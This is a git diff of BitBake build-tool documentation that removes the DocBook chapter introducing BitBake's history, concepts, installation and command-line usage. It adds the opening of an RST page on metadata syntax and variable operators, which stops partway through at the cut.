-                <listitem><para>OpenEmbedded, a metadata set utilized by
-                    BitBake</para></listitem>
-            </itemizedlist>
-            Today, BitBake is the primary basis of the
-            <ulink url="http://www.openembedded.org/">OpenEmbedded</ulink>
-            project, which is being used to build and maintain Linux
-            distributions such as the
-            <ulink url='http://www.angstrom-distribution.org/'>Angstrom Distribution</ulink>,
-            and which is also being used as the build tool for Linux projects
-            such as the
-            <ulink url='http://www.yoctoproject.org'>Yocto Project</ulink>.
-        </para>
-
-        <para>
-            Prior to BitBake, no other build tool adequately met the needs of
-            an aspiring embedded Linux distribution.
-            All of the build systems used by traditional desktop Linux
-            distributions lacked important functionality, and none of the
-            ad hoc Buildroot-based systems, prevalent in the
-            embedded space, were scalable or maintainable.
-        </para>
-
-        <para>
-            Some important original goals for BitBake were:
-            <itemizedlist>
-                <listitem><para>
-                    Handle cross-compilation.
-                    </para></listitem>
-                <listitem><para>
-                    Handle inter-package dependencies (build time on
-                    target architecture, build time on native
-                    architecture, and runtime).
-                    </para></listitem>
-                <listitem><para>
-                    Support running any number of tasks within a given
-                    package, including, but not limited to, fetching
-                    upstream sources, unpacking them, patching them,
-                    configuring them, and so forth.
-                    </para></listitem>
-                <listitem><para>
-                    Be Linux distribution agnostic for both build and
-                    target systems.
-                    </para></listitem>
-                <listitem><para>
-                    Be architecture agnostic.
-                    </para></listitem>
-                <listitem><para>
-                    Support multiple build and target operating systems
-                    (e.g. Cygwin, the BSDs, and so forth).
-                    </para></listitem>
-                <listitem><para>
-                    Be self-contained, rather than tightly
-                    integrated into the build machine's root
-                    filesystem.
-                    </para></listitem>
-                <listitem><para>
-                    Handle conditional metadata on the target architecture,
-                    operating system, distribution, and machine.
-                    </para></listitem>
-                <listitem><para>
-                    Be easy to use the tools to supply local metadata and packages
-                    against which to operate.
-                    </para></listitem>
-                <listitem><para>
-                    Be easy to use BitBake to collaborate between multiple
-                    projects for their builds.
-                    </para></listitem>
-                <listitem><para>
-                    Provide an inheritance mechanism to share
-                    common metadata between many packages.
-                    </para></listitem>
-            </itemizedlist>
-            Over time it became apparent that some further requirements
-            were necessary:
-            <itemizedlist>
-                <listitem><para>
-                    Handle variants of a base recipe (e.g. native, sdk,
-                    and multilib).
-                    </para></listitem>
-                <listitem><para>
-                    Split metadata into layers and allow layers
-                    to enhance or override other layers.
-                    </para></listitem>
-                <listitem><para>
-                    Allow representation of a given set of input variables
-                    to a task as a checksum.
-                    Based on that checksum, allow acceleration of builds
-                    with prebuilt components.
-                    </para></listitem>
-            </itemizedlist>
-            BitBake satisfies all the original requirements and many more
-            with extensions being made to the basic functionality to
-            reflect the additional requirements.
-            Flexibility and power have always been the priorities.
-            BitBake is highly extensible and supports embedded Python code and
-            execution of any arbitrary tasks.
-        </para>
-    </section>
-
-    <section id="Concepts">
-        <title>Concepts</title>
-
-        <para>
-            BitBake is a program written in the Python language.
-            At the highest level, BitBake interprets metadata, decides
-            what tasks are required to run, and executes those tasks.
-            Similar to GNU Make, BitBake controls how software is
-            built.
-            GNU Make achieves its control through "makefiles", while
-            BitBake uses "recipes".
-        </para>
-
-        <para>
-            BitBake extends the capabilities of a simple
-            tool like GNU Make by allowing for the definition of much more
-            complex tasks, such as assembling entire embedded Linux
-            distributions.
-        </para>
-
-        <para>
-            The remainder of this section introduces several concepts
-            that should be understood in order to better leverage
-            the power of BitBake.
-        </para>
-
-        <section id='recipes'>
-            <title>Recipes</title>
-
-            <para>
-                BitBake Recipes, which are denoted by the file extension
-                <filename>.bb</filename>, are the most basic metadata files.
-                These recipe files provide BitBake with the following:
-                <itemizedlist>
-                    <listitem><para>Descriptive information about the
-                        package (author, homepage, license, and so on)</para></listitem>
-                    <listitem><para>The version of the recipe</para></listitem>
-                    <listitem><para>Existing dependencies (both build
-                        and runtime dependencies)</para></listitem>
-                    <listitem><para>Where the source code resides and
-                        how to fetch it</para></listitem>
-                    <listitem><para>Whether the source code requires
-                        any patches, where to find them, and how to apply
-                        them</para></listitem>
-                    <listitem><para>How to configure and compile the
-                        source code</para></listitem>
-                    <listitem><para>How to assemble the generated artifacts into
-                        one or more installable packages</para></listitem>
-                    <listitem><para>Where on the target machine to install the
-                        package or packages created</para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                Within the context of BitBake, or any project utilizing BitBake
-                as its build system, files with the <filename>.bb</filename>
-                extension are referred to as <firstterm>recipes</firstterm>.
-                <note>
-                    The term "package" is also commonly used to describe recipes.
-                    However, since the same word is used to describe packaged
-                    output from a project, it is best to maintain a single
-                    descriptive term - "recipes".
-                    Put another way, a single "recipe" file is quite capable
-                    of generating a number of related but separately installable
-                    "packages".
-                    In fact, that ability is fairly common.
-                </note>
-            </para>
-        </section>
-
-        <section id='configuration-files'>
-            <title>Configuration Files</title>
-
-            <para>
-                Configuration files, which are denoted by the
-                <filename>.conf</filename> extension, define
-                various configuration variables that govern the project's build
-                process.
-                These files fall into several areas that define
-                machine configuration, distribution configuration,
-                possible compiler tuning, general common
-                configuration, and user configuration.
-                The main configuration file is the sample
-                <filename>bitbake.conf</filename> file, which is
-                located within the BitBake source tree
-                <filename>conf</filename> directory.
-            </para>
-        </section>
-
-        <section id='classes'>
-            <title>Classes</title>
-
-            <para>
-                Class files, which are denoted by the
-                <filename>.bbclass</filename> extension, contain
-                information that is useful to share between metadata files.
-                The BitBake source tree currently comes with one class metadata file
-                called <filename>base.bbclass</filename>.
-                You can find this file in the
-                <filename>classes</filename> directory.
-                The <filename>base.bbclass</filename> class files is special since it
-                is always included automatically for all recipes
-                and classes.
-                This class contains definitions for standard basic tasks such
-                as fetching, unpacking, configuring (empty by default),
-                compiling (runs any Makefile present), installing (empty by
-                default) and packaging (empty by default).
-                These tasks are often overridden or extended by other classes
-                added during the project development process.
-            </para>
-        </section>
-
-        <section id='layers'>
-            <title>Layers</title>
-
-            <para>
-                Layers allow you to isolate different types of
-                customizations from each other.
-                While you might find it tempting to keep everything in one layer
-                when working on a single project, the more modular
-                your metadata, the easier it is to cope with future changes.
-            </para>
-
-            <para>
-                To illustrate how you can use layers to keep things modular,
-                consider customizations you might make to support a specific target machine.
-                These types of customizations typically reside in a special layer,
-                rather than a general layer, called a <firstterm>Board Support Package</firstterm> (BSP)
-                layer.
-                Furthermore, the machine customizations should be isolated from
-                recipes and metadata that support a new GUI environment, for
-                example.
-                This situation gives you a couple of layers: one for the machine
-                configurations and one for the GUI environment.
-                It is important to understand, however, that the BSP layer can still
-                make machine-specific additions to recipes within
-                the GUI environment layer without polluting the GUI layer itself
-                with those machine-specific changes.
-                You can accomplish this through a recipe that is a BitBake append
-                (<filename>.bbappend</filename>) file.
-            </para>
-        </section>
-
-        <section id='append-bbappend-files'>
-            <title>Append Files</title>
-
-            <para>
-                Append files, which are files that have the
-                <filename>.bbappend</filename> file extension, extend or
-                override information in an existing recipe file.
-            </para>
-
-            <para>
-                BitBake expects every append file to have a corresponding recipe file.
-                Furthermore, the append file and corresponding recipe file
-                must use the same root filename.
-                The filenames can differ only in the file type suffix used
-                (e.g. <filename>formfactor_0.0.bb</filename> and
-                <filename>formfactor_0.0.bbappend</filename>).
-            </para>
-
-            <para>
-                Information in append files extends or
-                overrides the information in the underlying,
-                similarly-named recipe files.
-            </para>
-
-            <para>
-                When you name an append file, you can use the
-                "<filename>%</filename>" wildcard character to allow for matching
-                recipe names.
-                For example, suppose you have an append file named
-                as follows:
-                <literallayout class='monospaced'>
-     busybox_1.21.%.bbappend
-                </literallayout>
-                That append file would match any <filename>busybox_1.21.</filename><replaceable>x</replaceable><filename>.bb</filename>
-                version of the recipe.
-                So, the append file would match the following recipe names:
-                <literallayout class='monospaced'>
-     busybox_1.21.1.bb
-     busybox_1.21.2.bb
-     busybox_1.21.3.bb
-                </literallayout>
-                <note><title>Important</title>
-                    The use of the "<filename>%</filename>" character
-                    is limited in that it only works directly in front of the
-                    <filename>.bbappend</filename> portion of the append file's
-                    name.
-                    You cannot use the wildcard character in any other
-                    location of the name.
-                </note>
-                If the <filename>busybox</filename> recipe was updated to
-                <filename>busybox_1.3.0.bb</filename>, the append name would not
-                match.
-                However, if you named the append file
-                <filename>busybox_1.%.bbappend</filename>, then you would have a match.
-            </para>
-
-            <para>
-                In the most general case, you could name the append file something as
-                simple as <filename>busybox_%.bbappend</filename> to be entirely
-                version independent.
-            </para>
-        </section>
-    </section>
-
-    <section id='obtaining-bitbake'>
-        <title>Obtaining BitBake</title>
-
-        <para>
-            You can obtain BitBake several different ways:
-            <itemizedlist>
-                <listitem><para><emphasis>Cloning BitBake:</emphasis>
-                    Using Git to clone the BitBake source code repository
-                    is the recommended method for obtaining BitBake.
-                    Cloning the repository makes it easy to get bug fixes
-                    and have access to stable branches and the master
-                    branch.
-                    Once you have cloned BitBake, you should use
-                    the latest stable
-                    branch for development since the master branch is for
-                    BitBake development and might contain less stable changes.
-                    </para>
-                    <para>You usually need a version of BitBake
-                    that matches the metadata you are using.
-                    The metadata is generally backwards compatible but
-                    not forward compatible.</para>
-                    <para>Here is an example that clones the BitBake repository:
-                    <literallayout class='monospaced'>
-     $ git clone git://git.openembedded.org/bitbake
-                    </literallayout>
-                    This command clones the BitBake Git repository into a
-                    directory called <filename>bitbake</filename>.
-                    Alternatively, you can
-                    designate a directory after the
-                    <filename>git clone</filename> command
-                    if you want to call the new directory something
-                    other than <filename>bitbake</filename>.
-                    Here is an example that names the directory
-                    <filename>bbdev</filename>:
-                    <literallayout class='monospaced'>
-     $ git clone git://git.openembedded.org/bitbake bbdev
-                    </literallayout></para></listitem>
-                <listitem><para><emphasis>Installation using your Distribution
-                    Package Management System:</emphasis>
-                    This method is not
-                    recommended because the BitBake version that is
-                    provided by your distribution, in most cases,
-                    is several
-                    releases behind a snapshot of the BitBake repository.
-                    </para></listitem>
-                <listitem><para><emphasis>Taking a snapshot of BitBake:</emphasis>
-                    Downloading a snapshot of BitBake from the
-                    source code repository gives you access to a known
-                    branch or release of BitBake.
-                    <note>
-                         Cloning the Git repository, as described earlier,
-                         is the preferred method for getting BitBake.
-                         Cloning the repository makes it easier to update as
-                         patches are added to the stable branches.
-                    </note></para>
-                    <para>The following example downloads a snapshot of
-                    BitBake version 1.17.0:
-                    <literallayout class='monospaced'>
-     $ wget http://git.openembedded.org/bitbake/snapshot/bitbake-1.17.0.tar.gz
-     $ tar zxpvf bitbake-1.17.0.tar.gz
-                    </literallayout>
-                    After extraction of the tarball using the tar utility,
-                    you have a directory entitled
-                    <filename>bitbake-1.17.0</filename>.
-                    </para></listitem>
-                <listitem><para><emphasis>Using the BitBake that Comes With Your
-                    Build Checkout:</emphasis>
-                    A final possibility for getting a copy of BitBake is that it
-                    already comes with your checkout of a larger BitBake-based build
-                    system, such as Poky.
-                    Rather than manually checking out individual layers and
-                    gluing them together yourself, you can check
-                    out an entire build system.
-                    The checkout will already include a version of BitBake that
-                    has been thoroughly tested for compatibility with the other
-                    components.
-                    For information on how to check out a particular BitBake-based
-                    build system, consult that build system's supporting documentation.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id="bitbake-user-manual-command">
-        <title>The BitBake Command</title>
-
-        <para>
-            The <filename>bitbake</filename> command is the primary interface
-            to the BitBake tool.
-            This section presents the BitBake command syntax and provides
-            several execution examples.
-        </para>
-
-        <section id='usage-and-syntax'>
-            <title>Usage and syntax</title>
-
-            <para>
-                Following is the usage and syntax for BitBake:
-                <literallayout class='monospaced'>
-     $ bitbake -h
-     Usage: bitbake [options] [recipename/target recipe:do_task ...]
-
-         Executes the specified task (default is 'build') for a given set of target recipes (.bb files).
-         It is assumed there is a conf/bblayers.conf available in cwd or in BBPATH which
-         will provide the layer, BBFILES and other configuration information.
-
-     Options:
-       --version             show program's version number and exit
-       -h, --help            show this help message and exit
-       -b BUILDFILE, --buildfile=BUILDFILE
-                             Execute tasks from a specific .bb recipe directly.
-                             WARNING: Does not handle any dependencies from other
-                             recipes.
-       -k, --continue        Continue as much as possible after an error. While the
-                             target that failed and anything depending on it cannot
-                             be built, as much as possible will be built before
-                             stopping.
-       -f, --force           Force the specified targets/task to run (invalidating
-                             any existing stamp file).
-       -c CMD, --cmd=CMD     Specify the task to execute. The exact options
-                             available depend on the metadata. Some examples might
-                             be 'compile' or 'populate_sysroot' or 'listtasks' may
-                             give a list of the tasks available.
-       -C INVALIDATE_STAMP, --clear-stamp=INVALIDATE_STAMP
-                             Invalidate the stamp for the specified task such as
-                             'compile' and then run the default task for the
-                             specified target(s).
-       -r PREFILE, --read=PREFILE
-                             Read the specified file before bitbake.conf.
-       -R POSTFILE, --postread=POSTFILE
-                             Read the specified file after bitbake.conf.
-       -v, --verbose         Enable tracing of shell tasks (with 'set -x'). Also
-                             print bb.note(...) messages to stdout (in addition to
-                             writing them to ${T}/log.do_&lt;task&gt;).
-       -D, --debug           Increase the debug level. You can specify this more
-                             than once. -D sets the debug level to 1, where only
-                             bb.debug(1, ...) messages are printed to stdout; -DD
-                             sets the debug level to 2, where both bb.debug(1, ...)
-                             and bb.debug(2, ...) messages are printed; etc.
-                             Without -D, no debug messages are printed. Note that
-                             -D only affects output to stdout. All debug messages
-                             are written to ${T}/log.do_taskname, regardless of the
-                             debug level.
-       -q, --quiet           Output less log message data to the terminal. You can
-                             specify this more than once.
-       -n, --dry-run         Don't execute, just go through the motions.
-       -S SIGNATURE_HANDLER, --dump-signatures=SIGNATURE_HANDLER
-                             Dump out the signature construction information, with
-                             no task execution. The SIGNATURE_HANDLER parameter is
-                             passed to the handler. Two common values are none and
-                             printdiff but the handler may define more/less. none
-                             means only dump the signature, printdiff means compare
-                             the dumped signature with the cached one.
-       -p, --parse-only      Quit after parsing the BB recipes.
-       -s, --show-versions   Show current and preferred versions of all recipes.
-       -e, --environment     Show the global or per-recipe environment complete
-                             with information about where variables were
-                             set/changed.
-       -g, --graphviz        Save dependency tree information for the specified
-                             targets in the dot syntax.
-       -I EXTRA_ASSUME_PROVIDED, --ignore-deps=EXTRA_ASSUME_PROVIDED
-                             Assume these dependencies don't exist and are already
-                             provided (equivalent to ASSUME_PROVIDED). Useful to
-                             make dependency graphs more appealing
-       -l DEBUG_DOMAINS, --log-domains=DEBUG_DOMAINS
-                             Show debug logging for the specified logging domains
-       -P, --profile         Profile the command and save reports.
-       -u UI, --ui=UI        The user interface to use (knotty, ncurses or taskexp
-                             - default knotty).
-       --token=XMLRPCTOKEN   Specify the connection token to be used when
-                             connecting to a remote server.
-       --revisions-changed   Set the exit code depending on whether upstream
-                             floating revisions have changed or not.
-       --server-only         Run bitbake without a UI, only starting a server
-                             (cooker) process.
-       -B BIND, --bind=BIND  The name/address for the bitbake xmlrpc server to bind
-                             to.
-       -T SERVER_TIMEOUT, --idle-timeout=SERVER_TIMEOUT
-                             Set timeout to unload bitbake server due to
-                             inactivity, set to -1 means no unload, default:
-                             Environment variable BB_SERVER_TIMEOUT.
-       --no-setscene         Do not run any setscene tasks. sstate will be ignored
-                             and everything needed, built.
-       --setscene-only       Only run setscene tasks, don't run any real tasks.
-       --remote-server=REMOTE_SERVER
-                             Connect to the specified server.
-       -m, --kill-server     Terminate any running bitbake server.
-       --observe-only        Connect to a server as an observing-only client.
-       --status-only         Check the status of the remote bitbake server.
-       -w WRITEEVENTLOG, --write-log=WRITEEVENTLOG
-                             Writes the event log of the build to a bitbake event
-                             json file. Use '' (empty string) to assign the name
-                             automatically.
-       --runall=RUNALL       Run the specified task for any recipe in the taskgraph
-                             of the specified target (even if it wouldn't otherwise
-                             have run).
-       --runonly=RUNONLY     Run only the specified task within the taskgraph of
-                             the specified targets (and any task dependencies those
-                             tasks may have).
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='bitbake-examples'>
-            <title>Examples</title>
-
-            <para>
-                This section presents some examples showing how to use BitBake.
-            </para>
-
-            <section id='example-executing-a-task-against-a-single-recipe'>
-                <title>Executing a Task Against a Single Recipe</title>
-
-                <para>
-                    Executing tasks for a single recipe file is relatively simple.
-                    You specify the file in question, and BitBake parses
-                    it and executes the specified task.
-                    If you do not specify a task, BitBake executes the default
-                    task, which is "build�.
-                    BitBake obeys inter-task dependencies when doing
-                    so.
-                </para>
-
-                <para>
-                    The following command runs the build task, which is
-                    the default task, on the <filename>foo_1.0.bb</filename>
-                    recipe file:
-                    <literallayout class='monospaced'>
-     $ bitbake -b foo_1.0.bb
-                    </literallayout>
-                    The following command runs the clean task on the
-                    <filename>foo.bb</filename> recipe file:
-                    <literallayout class='monospaced'>
-     $ bitbake -b foo.bb -c clean
-                    </literallayout>
-                    <note>
-                        The "-b" option explicitly does not handle recipe
-                        dependencies.
-                        Other than for debugging purposes, it is instead
-                        recommended that you use the syntax presented in the
-                        next section.
-                    </note>
-                </para>
-            </section>
-
-            <section id='executing-tasks-against-a-set-of-recipe-files'>
-                <title>Executing Tasks Against a Set of Recipe Files</title>
-
-                <para>
-                    There are a number of additional complexities introduced
-                    when one wants to manage multiple <filename>.bb</filename>
-                    files.
-                    Clearly there needs to be a way to tell BitBake what
-                    files are available and, of those, which you
-                    want to execute.
-                    There also needs to be a way for each recipe
-                    to express its dependencies, both for build-time and
-                    runtime.
-                    There must be a way for you to express recipe preferences
-                    when multiple recipes provide the same functionality, or when
-                    there are multiple versions of a recipe.
-                </para>
-
-                <para>
-                    The <filename>bitbake</filename> command, when not using
-                    "--buildfile" or "-b" only accepts a "PROVIDES".
-                    You cannot provide anything else.
-                    By default, a recipe file generally "PROVIDES" its
-                    "packagename" as shown in the following example:
-                    <literallayout class='monospaced'>
-     $ bitbake foo
-                    </literallayout>
-                    This next example "PROVIDES" the package name and also uses
-                    the "-c" option to tell BitBake to just execute the
-                    <filename>do_clean</filename> task:
-                    <literallayout class='monospaced'>
-     $ bitbake -c clean foo
-                    </literallayout>
-                </para>
-            </section>
-
-            <section id='executing-a-list-of-task-and-recipe-combinations'>
-                <title>Executing a List of Task and Recipe Combinations</title>
-
-                <para>
-                    The BitBake command line supports specifying different
-                    tasks for individual targets when you specify multiple
-                    targets.
-                    For example, suppose you had two targets (or recipes)
-                    <filename>myfirstrecipe</filename> and
-                    <filename>mysecondrecipe</filename> and you needed
-                    BitBake to run <filename>taskA</filename> for the first
-                    recipe and <filename>taskB</filename> for the second
-                    recipe:
-                    <literallayout class='monospaced'>
-     $ bitbake myfirstrecipe:do_taskA mysecondrecipe:do_taskB
-                    </literallayout>
-                </para>
-            </section>
-
-            <section id='generating-dependency-graphs'>
-                <title>Generating Dependency Graphs</title>
-
-                <para>
-                    BitBake is able to generate dependency graphs using
-                    the <filename>dot</filename> syntax.
-                    You can convert these graphs into images using the
-                    <filename>dot</filename> tool from
-                    <ulink url='http://www.graphviz.org'>Graphviz</ulink>.
-                </para>
-
-                <para>
-                    When you generate a dependency graph, BitBake writes two files
-                    to the current working directory:
-                    <itemizedlist>
-                        <listitem><para>
-                            <emphasis><filename>task-depends.dot</filename>:</emphasis>
-                            Shows dependencies between tasks.
-                            These dependencies match BitBake's internal task execution list.
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis><filename>pn-buildlist</filename>:</emphasis>
-                            Shows a simple list of targets that are to be built.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-
-                <para>
-                    To stop depending on common depends, use the "-I" depend
-                    option and BitBake omits them from the graph.
-                    Leaving this information out can produce more readable graphs.
-                    This way, you can remove from the graph
-                    <filename>DEPENDS</filename> from inherited classes
-                    such as <filename>base.bbclass</filename>.
-                </para>
-
-                <para>
-                    Here are two examples that create dependency graphs.
-                    The second example omits depends common in OpenEmbedded from
-                    the graph:
-                    <literallayout class='monospaced'>
-     $ bitbake -g foo
-
-     $ bitbake -g -I virtual/kernel -I eglibc foo
-                    </literallayout>
-                </para>
-            </section>
-
-            <section id='executing-a-multiple-configuration-build'>
-                <title>Executing a Multiple Configuration Build</title>
-
-                <para>
-                    BitBake is able to build multiple images or packages
-                    using a single command where the different targets
-                    require different configurations (multiple configuration
-                    builds).
-                    Each target, in this scenario, is referred to as a
-                    "multiconfig".
-                </para>
-
-                <para>
-                    To accomplish a multiple configuration build, you must
-                    define each target's configuration separately using
-                    a parallel configuration file in the build directory.
-                    The location for these multiconfig configuration files
-                    is specific.
-                    They must reside in the current build directory in
-                    a sub-directory of <filename>conf</filename> named
-                    <filename>multiconfig</filename>.
-                    Following is an example for two separate targets:
-                    <imagedata fileref="figures/bb_multiconfig_files.png" align="center" width="4in" depth="3in" />
-                </para>
-
-                <para>
-                    The reason for this required file hierarchy
-                    is because the <filename>BBPATH</filename> variable
-                    is not constructed until the layers are parsed.
-                    Consequently, using the configuration file as a
-                    pre-configuration file is not possible unless it is
-                    located in the current working directory.
-                </para>
-
-                <para>
-                    Minimally, each configuration file must define the
-                    machine and the temporary directory BitBake uses
-                    for the build.
-                    Suggested practice dictates that you do not
-                    overlap the temporary directories used during the
-                    builds.
-                </para>
-
-                <para>
-                    Aside from separate configuration files for each
-                    target, you must also enable BitBake to perform multiple
-                    configuration builds.
-                    Enabling is accomplished by setting the
-                    <link linkend='var-bb-BBMULTICONFIG'><filename>BBMULTICONFIG</filename></link>
-                    variable in the <filename>local.conf</filename>
-                    configuration file.
-                    As an example, suppose you had configuration files
-                    for <filename>target1</filename> and
-                    <filename>target2</filename> defined in the build
-                    directory.
-                    The following statement in the
-                    <filename>local.conf</filename> file both enables
-                    BitBake to perform multiple configuration builds and
-                    specifies the two extra multiconfigs:
-                    <literallayout class='monospaced'>
-     BBMULTICONFIG = "target1 target2"
-                    </literallayout>
-                </para>
-
-                <para>
-                    Once the target configuration files are in place and
-                    BitBake has been enabled to perform multiple configuration
-                    builds, use the following command form to start the
-                    builds:
-                    <literallayout class='monospaced'>
-     $ bitbake [mc:<replaceable>multiconfigname</replaceable>:]<replaceable>target</replaceable> [[[mc:<replaceable>multiconfigname</replaceable>:]<replaceable>target</replaceable>] ... ]
-                    </literallayout>
-                    Here is an example for two extra multiconfigs:
-                    <filename>target1</filename> and
-                    <filename>target2</filename>:
-                    <literallayout class='monospaced'>
-     $ bitbake mc::<replaceable>target</replaceable> mc:target1:<replaceable>target</replaceable> mc:target2:<replaceable>target</replaceable>
-                    </literallayout>
-                </para>
-            </section>
-
-            <section id='bb-enabling-multiple-configuration-build-dependencies'>
-                <title>Enabling Multiple Configuration Build Dependencies</title>
-
-                <para>
-                    Sometimes dependencies can exist between targets
-                    (multiconfigs) in a multiple configuration build.
-                    For example, suppose that in order to build an image
-                    for a particular architecture, the root filesystem of
-                    another build for a different architecture needs to
-                    exist.
-                    In other words, the image for the first multiconfig depends
-                    on the root filesystem of the second multiconfig.
-                    This dependency is essentially that the task in the recipe
-                    that builds one multiconfig is dependent on the
-                    completion of the task in the recipe that builds
-                    another multiconfig.
-                </para>
-
-                <para>
-                    To enable dependencies in a multiple configuration
-                    build, you must declare the dependencies in the recipe
-                    using the following statement form:
-                    <literallayout class='monospaced'>
-     <replaceable>task_or_package</replaceable>[mcdepends] = "mc:<replaceable>from_multiconfig</replaceable>:<replaceable>to_multiconfig</replaceable>:<replaceable>recipe_name</replaceable>:<replaceable>task_on_which_to_depend</replaceable>"
-                    </literallayout>
-                    To better show how to use this statement, consider an
-                    example with two multiconfigs: <filename>target1</filename>
-                    and <filename>target2</filename>:
-                    <literallayout class='monospaced'>
-     <replaceable>image_task</replaceable>[mcdepends] = "mc:target1:target2:<replaceable>image2</replaceable>:<replaceable>rootfs_task</replaceable>"
-                    </literallayout>
-                    In this example, the
-                    <replaceable>from_multiconfig</replaceable> is "target1" and
-                    the <replaceable>to_multiconfig</replaceable> is "target2".
-                    The task on which the image whose recipe contains
-                    <replaceable>image_task</replaceable> depends on the
-                    completion of the <replaceable>rootfs_task</replaceable>
-                    used to build out <replaceable>image2</replaceable>, which
-                    is associated with the "target2" multiconfig.
-               </para>
-
-               <para>
-                   Once you set up this dependency, you can build the
-                   "target1" multiconfig using a BitBake command as follows:
-                   <literallayout class='monospaced'>
-     $ bitbake mc:target1:<replaceable>image1</replaceable>
-                   </literallayout>
-                   This command executes all the tasks needed to create
-                   <replaceable>image1</replaceable> for the "target1"
-                   multiconfig.
-                   Because of the dependency, BitBake also executes through
-                   the <replaceable>rootfs_task</replaceable> for the "target2"
-                   multiconfig build.
-               </para>
-
-               <para>
-                   Having a recipe depend on the root filesystem of another
-                   build might not seem that useful.
-                   Consider this change to the statement in the
-                   <replaceable>image1</replaceable> recipe:
-                   <literallayout class='monospaced'>
-     <replaceable>image_task</replaceable>[mcdepends] = "mc:target1:target2:<replaceable>image2</replaceable>:<replaceable>image_task</replaceable>"
-                   </literallayout>
-                   In this case, BitBake must create
-                   <replaceable>image2</replaceable> for the "target2"
-                   build since the "target1" build depends on it.
-               </para>
-
-               <para>
-                   Because "target1" and "target2" are enabled for multiple
-                   configuration builds and have separate configuration
-                   files, BitBake places the artifacts for each build in the
-                   respective temporary build directories.
-               </para>
-            </section>
-        </section>
-    </section>
-</chapter>
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-metadata.rst b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-metadata.rst
new file mode 100644
index 0000000000..7ea68ade72
--- /dev/null
+++ b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-metadata.rst
@@ -0,0 +1,1969 @@
+.. SPDX-License-Identifier: CC-BY-2.5
+
+====================
+Syntax and Operators
+====================
+
+|
+
+BitBake files have their own syntax. The syntax has similarities to
+several other languages but also has some unique features. This section
+describes the available syntax and operators as well as provides
+examples.
+
+Basic Syntax
+============
+
+This section provides some basic syntax examples.
+
+Basic Variable Setting
+----------------------
+
+The following example sets ``VARIABLE`` to "value". This assignment
+occurs immediately as the statement is parsed. It is a "hard"
+assignment. ::
+
+   VARIABLE = "value"
+
+As expected, if you include leading or
+trailing spaces as part of an assignment, the spaces are retained: ::
+
+   VARIABLE = " value"
+   VARIABLE = "value "
+
+Setting ``VARIABLE`` to "" sets
+it to an empty string, while setting the variable to " " sets it to a
+blank space (i.e. these are not the same values). ::
+
+   VARIABLE = ""
+   VARIABLE = " "
+
+You can use single quotes instead of double quotes when setting a
+variable's value. Doing so allows you to use values that contain the
+double quote character: ::
+
+   VARIABLE = 'I have a " in my value'
+
+.. note::
+
+   Unlike in Bourne shells, single quotes work identically to double
+   quotes in all other ways. They do not suppress variable expansions.
+
+Modifying Existing Variables
+----------------------------
+
+Sometimes you need to modify existing variables. Following are some
+cases where you might find you want to modify an existing variable:
+
+-  Customize a recipe that uses the variable.
+
+-  Change a variable's default value used in a ``*.bbclass`` file.
+
+-  Change the variable in a ``*.bbappend`` file to override the variable
+   in the original recipe.
+
+-  Change the variable in a configuration file so that the value
+   overrides an existing configuration.
+
+Changing a variable value can sometimes depend on how the value was
+originally assigned and also on the desired intent of the change. In
+particular, when you append a value to a variable that has a default
+value, the resulting value might not be what you expect. In this case,
+the value you provide might replace the value rather than append to the
+default value.
+
+If after you have changed a variable's value and something unexplained
+occurs, you can use BitBake to check the actual value of the suspect
+variable. You can make these checks for both configuration and recipe
+level changes:
+
+-  For configuration changes, use the following: ::
+
+      $ bitbake -e
+
+   This
+   command displays variable values after the configuration files (i.e.
+   ``local.conf``, ``bblayers.conf``, ``bitbake.conf`` and so forth)
+   have been parsed.
+
+   .. note::
+
+      Variables that are exported to the environment are preceded by the
+      string "export" in the command's output.
+
+-  For recipe changes, use the following: ::
+
+      $ bitbake recipe -e \| grep VARIABLE="
+
+   This command checks to see if the variable actually makes
+   it into a specific recipe.
+
+Line Joining
+------------
+
+Outside of :ref:`functions <bitbake-user-manual/bitbake-user-manual-metadata:functions>`,
+BitBake joins any line ending in
+a backslash character ("\") with the following line before parsing
+statements. The most common use for the "\" character is to split
+variable assignments over multiple lines, as in the following example: ::
+
+   FOO = "bar \
+          baz \
+          qaz"
+
+Both the "\" character and the newline
+character that follow it are removed when joining lines. Thus, no
+newline characters end up in the value of ``FOO``.
+
+Consider this additional example where the two assignments both assign
+"barbaz" to ``FOO``: ::
+
+   FOO = "barbaz"
+   FOO = "bar\
+   baz"
+
+.. note::
+
+   BitBake does not interpret escape sequences like "\n" in variable
+   values. For these to have an effect, the value must be passed to some
+   utility that interprets escape sequences, such as
+   ``printf`` or ``echo -n``.
+
+Variable Expansion
+------------------
+
+Variables can reference the contents of other variables using a syntax
+that is similar to variable expansion in Bourne shells. The following
+assignments result in A containing "aval" and B evaluating to
+"preavalpost". ::
+
+   A = "aval"
+   B = "pre${A}post"
+
+.. note::
+
+   Unlike in Bourne shells, the curly braces are mandatory: Only ``${FOO}`` and not
+   ``$FOO`` is recognized as an expansion of ``FOO``.
+
+The "=" operator does not immediately expand variable references in the
+right-hand side. Instead, expansion is deferred until the variable
+assigned to is actually used. The result depends on the current values
+of the referenced variables. The following example should clarify this
+behavior: ::
+
+   A = "${B} baz"
+   B = "${C} bar"
+   C = "foo"
+   *At this point, ${A} equals "foo bar baz"*
+   C = "qux"
+   *At this point, ${A} equals "qux bar baz"*
+   B = "norf"
+   *At this point, ${A} equals "norf baz"\*
+
+Contrast this behavior with the
+:ref:`bitbake-user-manual/bitbake-user-manual-metadata:immediate variable
+expansion (:=)` operator.
+
+If the variable expansion syntax is used on a variable that does not
+exist, the string is kept as is. For example, given the following
+assignment, ``BAR`` expands to the literal string "${FOO}" as long as
+``FOO`` does not exist. ::
+
+   BAR = "${FOO}"
+
+Setting a default value (?=)
+----------------------------
+
+You can use the "?=" operator to achieve a "softer" assignment for a
+variable. This type of assignment allows you to define a variable if it
+is undefined when the statement is parsed, but to leave the value alone
+if the variable has a value. Here is an example: ::
+
+   A ?= "aval"
+
+If ``A`` is
+set at the time this statement is parsed, the variable retains its
+value. However, if ``A`` is not set, the variable is set to "aval".
+
+.. note::
+
+   This assignment is immediate. Consequently, if multiple "?="
